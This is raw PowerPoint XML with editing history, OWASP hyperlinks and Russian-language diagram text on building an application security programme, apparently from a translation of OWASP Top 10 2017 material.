            <pc:sldMk cId="4197497568" sldId="311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6:53.634" v="3446" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4197497568" sldId="311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5:07.370" v="3252" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4197497568" sldId="311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40:05.505" v="3536" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4197497568" sldId="311"/>
            <ac:spMk id="137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09.133" v="2917" actId="313"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4197497568" sldId="311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6:54:58.123" v="2910" actId="313"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1911491196" sldId="315"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T18:50:44.586" v="2716" actId="108"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1911491196" sldId="315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16:36.197" v="772" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1911491196" sldId="315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18:49.215" v="890" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1911491196" sldId="315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4:58.123" v="2910" actId="313"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1911491196" sldId="315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22:04.676" v="3076" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="872923206" sldId="318"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:22:04.676" v="3076" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="872923206" sldId="318"/>
            <ac:graphicFrameMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T18:39:54.775" v="2242" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1698158142" sldId="320"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-12T00:02:42.505" v="280" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="3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2T00:03:30.864" v="293" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T18:39:54.775" v="2242" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:graphicFrameMk id="12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2:25.871" v="2951" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="705852985" sldId="321"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:11:06.804" v="2950" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="705852985" sldId="321"/>
            <ac:spMk id="31" creationId="{9D11D811-BC41-418D-90D1-CD609B0626DA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:12:25.871" v="2951" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="705852985" sldId="321"/>
            <ac:spMk id="39" creationId="{AA4B2B9D-42EE-48ED-AED4-5EA8E4B64D6B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-14T05:55:37.049" v="2143" actId="108"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1107843752" sldId="322"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-14T05:54:46.649" v="2142" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1107843752" sldId="322"/>
            <ac:spMk id="3" creationId="{81EC5A71-CDF7-40E6-9F8A-7B7F0554B2F8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-14T05:55:37.049" v="2143" actId="108"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1107843752" sldId="322"/>
            <ac:graphicFrameMk id="11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7:33:32.265" v="2152" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2323774989" sldId="323"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T17:33:32.265" v="2152" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2323774989" sldId="323"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add modTransition">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T17:45:13.877" v="2155" actId="108"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2201333637" sldId="324"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Gabriel Lawrence" userId="4d24c77f19546939" providerId="LiveId" clId="{8840B8BB-2388-403A-87C8-D7EE3254AED6}"/>
    <pc:docChg chg="undo custSel modSld">
      <pc:chgData name="Gabriel Lawrence" userId="4d24c77f19546939" providerId="LiveId" clId="{8840B8BB-2388-403A-87C8-D7EE3254AED6}" dt="2017-11-10T00:53:26.885" v="476" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Gabriel Lawrence" userId="4d24c77f19546939" providerId="LiveId" clId="{8840B8BB-2388-403A-87C8-D7EE3254AED6}" dt="2017-11-10T00:53:26.885" v="476" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2097789725" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Gabriel Lawrence" userId="4d24c77f19546939" providerId="LiveId" clId="{8840B8BB-2388-403A-87C8-D7EE3254AED6}" dt="2017-11-10T00:52:40.806" v="473" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Gabriel Lawrence" userId="4d24c77f19546939" providerId="LiveId" clId="{8840B8BB-2388-403A-87C8-D7EE3254AED6}" dt="2017-11-10T00:53:26.885" v="476" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310"/>
            <ac:spMk id="109" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Gabriel Lawrence" userId="4d24c77f19546939" providerId="LiveId" clId="{8840B8BB-2388-403A-87C8-D7EE3254AED6}" dt="2017-11-10T00:30:09.753" v="4" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310"/>
            <ac:spMk id="137" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{5A569433-C3B6-495E-8280-8AA394FBBF58}"/>
    <pc:docChg chg="undo modSld">
      <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{5A569433-C3B6-495E-8280-8AA394FBBF58}" dt="2017-11-04T00:42:37.562" v="87" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{5A569433-C3B6-495E-8280-8AA394FBBF58}" dt="2017-11-04T00:42:37.562" v="87" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2630728331" sldId="309"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{5A569433-C3B6-495E-8280-8AA394FBBF58}" dt="2017-11-04T00:38:51.545" v="30" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2630728331" sldId="309"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{5A569433-C3B6-495E-8280-8AA394FBBF58}" dt="2017-11-04T00:42:37.562" v="87" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2630728331" sldId="309"/>
            <ac:spMk id="109" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{5A569433-C3B6-495E-8280-8AA394FBBF58}" dt="2017-11-04T00:39:39.687" v="54" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2630728331" sldId="309"/>
            <ac:graphicFrameMk id="34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SAMM_-_Design_Review_-_1" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Threat_Assessment_-_1" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_3" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Policy_&amp;_Compliance_-_2" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_2" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Verification" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_3" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Construction" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_1" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Security_Testing_-_1" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_2" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Code_Review_-_1" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology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owasp.org/index.php/OWASP_Secure_Software_Contract_Annex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SAMM_-_Education_&amp;_Guidance_-_2" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Code_Review_-_1" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Design_Review_-_1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_3" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_1" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Policy_&amp;_Compliance_-_2" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Threat_Assessment_-_1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_3" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Verification" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_2" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Construction" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Security_Testing_-_1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owasp.org/index.php/OWASP_Secure_Software_Contract_Anne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B7DFC-AE2C-443E-8CBC-87D79BE207FB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114BD6-AB84-47D7-90FA-E674D66B7A70}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="ru-RU" sz="1050" b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Начало работы</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A201932A-BA50-4861-8522-7F31487BAA62}" type="parTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" type="sibTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BCC482EA-6C38-44EB-ABEC-842881B2C1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Задокументируйте все приложения и связанные с ними данные. Крупным организациям рекомендуется использовать для этих целей базу данных управления конфигурацией.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5C6F9E8-15EA-4DB6-A217-AAF35BF62BA9}" type="parTrans" cxnId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B795B6C3-2D36-4EF0-A50C-AE561665029F}" type="sibTrans" cxnId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="ru-RU" sz="10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Общий подход на основе рисков</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" type="parTrans" cxnId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D22B1E2D-9241-472F-8A9E-565E70887137}" type="sibTrans" cxnId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F576BD5F-AD4E-429F-935A-1A67C630AE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требуемый уровень защиты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ваших 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приложений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точки зрения бизнеса. При этом руководствуйтесь законами о конфиденциальности и другими нормативными документами, относящимися к защищаемым данным. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EE435F92-04EC-45B6-94A8-51EF1EBF242B}" type="parTrans" cxnId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EBA831D-0061-461C-A1EF-795466184E12}" type="sibTrans" cxnId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDF0D463-07CB-4904-B045-2FC63D99B581}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="ru-RU" sz="10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Подготовка надежной базы</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E44837D-D7DC-4906-821E-A6950790F46F}" type="parTrans" cxnId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}" type="sibTrans" cxnId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D20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специальные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2"/>
            </a:rPr>
            <a:t>политики и стандарты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использоваться всеми разработчиками в качестве основ обеспечения безопасности приложений.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B3561F2-F580-4BA5-B06C-3004CD728F94}" type="parTrans" cxnId="{68D71606-5C52-434C-93A7-B1ED203D82B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2CCD953C-110F-4B11-9CBE-349755B93BC6}" type="sibTrans" cxnId="{68D71606-5C52-434C-93A7-B1ED203D82B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1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3"/>
            </a:rPr>
            <a:t>набор стандартных средств обеспечения безопасности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дополнять эти политики и стандарты, а также содержать руководство по их использованию при проектировании и разработке.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A67A6BB-3147-45FF-9B2C-B44B543F5A2A}" type="parTrans" cxnId="{9CB74495-237D-4F40-98F9-915162C6F1AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ECD43AAD-CCE0-45CE-8EFA-57AC257C5615}" type="sibTrans" cxnId="{9CB74495-237D-4F40-98F9-915162C6F1AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{024BBBE2-0706-4354-8AB0-3262009E886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4"/>
            </a:rPr>
            <a:t>курсы по обеспечению безопасности приложений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посвященные разным темам и целям разработки.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8AF02AF4-6088-4389-900C-B1A6C7B52EA4}" type="parTrans" cxnId="{3AF172E9-5C4E-4B5A-8CB8-8FFF05450408}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C468EA37-5762-4D06-A4F9-E930ECF24341}" type="sibTrans" cxnId="{3AF172E9-5C4E-4B5A-8CB8-8FFF05450408}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="ru-RU" sz="1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Интеграция </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="9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безопасности в </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="8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существующие</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="1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процессы</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BC25BDC-3278-4082-B675-15E8A5144241}" type="parTrans" cxnId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}" type="sibTrans" cxnId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39E7FF2B-BF9A-4849-B74B-F0434B480B0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и внедрите в существующие процессы разработки и эксплуатации мероприятия по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5"/>
            </a:rPr>
            <a:t>безопасной реализации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6"/>
            </a:rPr>
            <a:t>контролю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 Состав работ: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7"/>
            </a:rPr>
            <a:t>моделирование угроз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безопасное проектирование и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8"/>
            </a:rPr>
            <a:t>анализ проектов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написание безопасного кода и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9"/>
            </a:rPr>
            <a:t>его анализ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</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="95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0"/>
            </a:rPr>
            <a:t>пентест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устранение недостатков.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C24D1CFC-B59D-48F6-8B6A-AD23468C518D}" type="parTrans" cxnId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2F85221-5EC1-4B22-9833-6E3F4447E6C8}" type="sibTrans" cxnId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{085D3A5B-E8C3-4ABB-9F97-7914BC59508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Для достижения успеха обеспечьте наличие экспертов в предметной области и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1"/>
            </a:rPr>
            <a:t>служб поддержки для разработчиков и проектной команды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</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D596540A-BB15-4E6E-8AD1-6C9E49AFC4B6}" type="parTrans" cxnId="{037BDB8F-830F-44B2-9861-7E6A03948B87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
